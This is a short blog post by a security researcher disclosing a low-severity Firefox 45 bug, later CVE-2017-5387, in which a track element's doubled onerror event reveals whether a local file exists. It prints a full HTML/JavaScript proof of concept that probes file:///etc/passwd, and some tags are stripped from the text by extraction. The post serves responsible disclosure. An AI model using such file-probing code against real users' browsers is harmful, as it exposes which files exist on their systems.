Hello everyone,
This is going to be a short write up about my first find regarding browser bugs, which was found in Firefox/45.0. The bug is of type “csectype-disclosure” and was flagged as sec-low by Mozilla’s team due to the fact that the malicious page has to be loaded locally (via the file:// protocol).
The bug existed because a ‘s onerror event is fired twice if the file pointed to in it’s src attribute doesn’t exist, but fires only once if the file existed but is not playable. The tag has to be included inside the opening and closing tags of an or . The following code is the PoC that was typically sent along with the report to Mozilla’s team:
<html> <head> <title>Testingtitle> head> <audio> <track id="q" src="file:///etc/passwd"> audio> <script> var i=0; q.onerror=function(){ i++; }; setTimeout(function(){ if(i==1){ alert('File Exists'); }else{ alert('File Does Not Exist'); } },100); script> body> html>
Finally, I would like to shout out to @Qab for making all that possible.
Update: This bug has been assigned CVE-2017-5387.
strukt's blog 